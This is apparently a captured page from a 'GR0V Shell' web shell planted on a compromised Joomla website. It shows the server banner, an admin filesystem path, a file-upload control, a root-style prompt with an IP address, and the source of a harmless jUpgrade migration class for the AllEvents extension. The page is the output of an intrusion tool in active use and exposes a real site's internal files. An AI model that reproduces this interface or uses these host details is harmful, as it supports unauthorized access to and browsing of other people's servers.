? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/administrator/components/com_jupgrade/extensions/
File Upload :
Current File : /home/admin/public_html/old/administrator/components/com_jupgrade/extensions/com_allevents.php

<?php
/**
 * @version		$Id: 
 * @package		AllEvents
 * @subpackage	com_allevents
 * @copyright	Copyright 2012 - 2012 Christophe Avonture. All rights reserved.
 * @license		GNU General Public License <http://www.gnu.org/copyleft/gpl.html>
 * @author		Christophe Avonture
 * @link		http://avonture.be/allevents/christophe-avonture
 */

// Check to ensure this file is within the rest of the framework
defined('JPATH_BASE') or die();

/**
 * jUpgrade class for AllEvents migration
 *
 * This class migrates the AllEvents extension
 *
 * @since		1.1.0
 */
class jUpgradeComponentAllEvents extends jUpgradeExtensions {

   /**
    * Check if extension migration is supported.
    *
    * @return	boolean
    * @since	1.1.0
    */
   protected function detectExtension() { 
      // Detect if AllEvents is installed
      return file_exists(JPATH_ROOT.DS.'administrator/components/com_allevents/admin.allevents.php');
   }
   /**
    * Migrate tables
    *
    * @return	boolean
    * @since	1.1.0
    */
   public function migrateExtensionCustom() {
       return true;
   }
}


T1KUS90T
  root-grov@210.1.60.28:~$